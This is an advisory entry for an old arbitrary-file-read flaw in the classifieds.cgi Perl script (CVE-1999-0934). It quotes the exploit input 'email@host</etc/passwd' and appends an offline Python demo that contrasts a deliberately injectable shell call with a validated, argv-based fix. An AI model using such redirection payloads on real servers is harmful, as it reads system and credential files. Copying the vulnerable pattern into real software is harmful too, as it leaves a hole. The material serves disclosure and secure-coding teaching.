Greg Matthews Classifieds.cgi Remote Arbitrary File Read Vulnerability

Vulnerability ID: 1105406
Vulnerability type: input validation
Published: 1998-12-15    Updated: 2005-05-02
CVE: CVE-1999-0934
CNNVD-ID: CNNVD-199912-052
Platform: CGI
CVSS score: 5.0
|Sources
https://www.exploit-db.com/exploits/20444
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199912-052
|Details
classifieds.cgi is a Perl script for placing classified ads on web pages, maintained by Greg Matthews. The script does not adequately filter user input, which allows a remote user to read any file on the web server that the httpd process has permission to read, with the privileges of that process. The discoverer did not publish further details beyond the SecurityFocus description below. <*Links: http://online.securityfocus.com/bid/2020/info/ and http://xforce.iss.net/static/3102.php*>
|Exploit
source: http://www.securityfocus.com/bid/2020/info

Classifieds.cgi is a perl script (part of the classifieds package by Greg Matthews) which provides simple classified ads to web sites. Due to improper input validation it can be used to read files on the host machine, with the privileges of the web server. This can be accomplished by embedding the input redirection metacharacter along with a filename into the form field used for e-mail address entry (<input name=return>). Any file that the web server process has read access to can be retrieved. 

Submit email@host</etc/passwd as e-mail address.
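The mechanism described above, as an added example that is not code from this page, from the classifieds package, or from SecurityFocus. Because the actual classifieds.cgi source is not reproduced here, the vulnerable shape is an assumption: the address from the `return` field is interpolated into a shell command that pipes the message to a mailer (Perl's `open(MAIL, "|$mailer $return")`), which is the pattern in which `<` acts as an input-redirection metacharacter. The example is written in Python with a constructed stand-in for sendmail so it runs offline; the file contents, addresses, paths and the `return`-field payload are all constructed here.

```python
"""Added example: how an unvalidated e-mail field turns into a file read, and the fix.

ASSUMPTION (the real classifieds.cgi source is not on the page): the address from
the `return` field is concatenated into a shell command that pipes the message to
a mailer, like Perl's open(MAIL, "|$mailer $return"). A constructed stand-in
replaces sendmail so this runs offline; every file, path and address is made up.
"""
import os
import re
import shlex
import subprocess
import sys
import tempfile

# Allowlist for the reply-to address: nothing outside these characters is
# accepted, so '<', '>', '|', ';', '`', '$' and whitespace never reach a command.
ADDRESS_RE = re.compile(r"^[A-Za-z0-9._%+-]{1,64}@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$")

# Constructed stand-in for sendmail: argv[1] is the recipient, the message body
# arrives on stdin, and both are appended to the file named in $OUTBOX.
FAKE_MAILER = """\
import os, sys
body = sys.stdin.read()
with open(os.environ["OUTBOX"], "a") as out:
    out.write("To: " + sys.argv[1] + "\\n" + body + "\\n--\\n")
"""


def is_safe_address(addr: str) -> bool:
    """Strict allowlist check for the `return` form field."""
    return ADDRESS_RE.fullmatch(addr) is not None


def vulnerable_send(mailer: str, addr: str, body: str, env: dict) -> None:
    """Assumed vulnerable shape: address concatenated into a shell command line.
    With addr = 'a@b</path' the shell redirects the mailer's stdin to /path, so
    the file, not `body`, is what gets mailed to a@b."""
    cmd = f"{mailer} {addr}"                      # no quoting, no validation
    proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE, env=env)
    proc.communicate(body.encode())               # EPIPE is swallowed by communicate()


def hardened_send(mailer_argv: list, addr: str, body: str, env: dict) -> None:
    """Fix: validate first, then pass the address as one argv element with no
    shell in between (Perl equivalent: open(my $m, '|-', $mailer, $return))."""
    if not is_safe_address(addr):
        raise ValueError(f"rejected reply-to address: {addr!r}")
    subprocess.run([*mailer_argv, addr], input=body.encode(), env=env, check=True)


def demo() -> dict:
    """Run both paths against a constructed secret file; return what each mailed."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = os.path.join(tmp, "secret.txt")
        with open(secret, "w") as f:
            f.write("root:x:0:0:root:/root:/bin/sh\n")  # constructed stand-in for /etc/passwd
        mailer_py = os.path.join(tmp, "fake_sendmail.py")
        with open(mailer_py, "w") as f:
            f.write(FAKE_MAILER)
        mailer_argv = [sys.executable, mailer_py]
        mailer_cmd = " ".join(shlex.quote(a) for a in mailer_argv)

        payload = f"attacker@example.com<{secret}"   # the BID's 'email@host</etc/passwd'
        body = "Your ad was posted.\n"
        results = {}

        outbox = os.path.join(tmp, "outbox_vuln")
        env = {**os.environ, "OUTBOX": outbox}
        vulnerable_send(mailer_cmd, payload, body, env)
        results["vulnerable_mailed"] = open(outbox).read()

        outbox = os.path.join(tmp, "outbox_fixed")
        env = {**os.environ, "OUTBOX": outbox}
        try:
            hardened_send(mailer_argv, payload, body, env)
            results["hardened_rejected"] = False
        except ValueError:
            results["hardened_rejected"] = True
        results["hardened_mailed_after_payload"] = os.path.exists(outbox)

        hardened_send(mailer_argv, "user@example.com", body, env)
        results["hardened_mailed"] = open(outbox).read()
        return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value!r}")
```

Run it directly to watch the vulnerable path mail the contents of the secret file to the attacker's address (the shell treats `<` as a redirection operator even with no whitespace around it, so `attacker@example.com` becomes argv[1] and the file becomes stdin) while the hardened path rejects the same payload at the form field. Both halves of the fix matter: the allowlist stops the payload early, and passing the address as a single argv element means that even an address that slipped past the check is never parsed by a shell. In Perl the argv form is the list-form pipe open, `open(my $mail, '|-', $mailer, $return)`.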
|References

Source: XF
Name: http-cgi-classifieds-read(3102)
Link: http://xforce.iss.net/xforce/xfdb/3102
Source: BID
Name: 2020
Link: http://www.securityfocus.com/bid/2020
Source: NSFOCUS
Name: 3208
Link: http://www.nsfocus.net/vulndb/3208
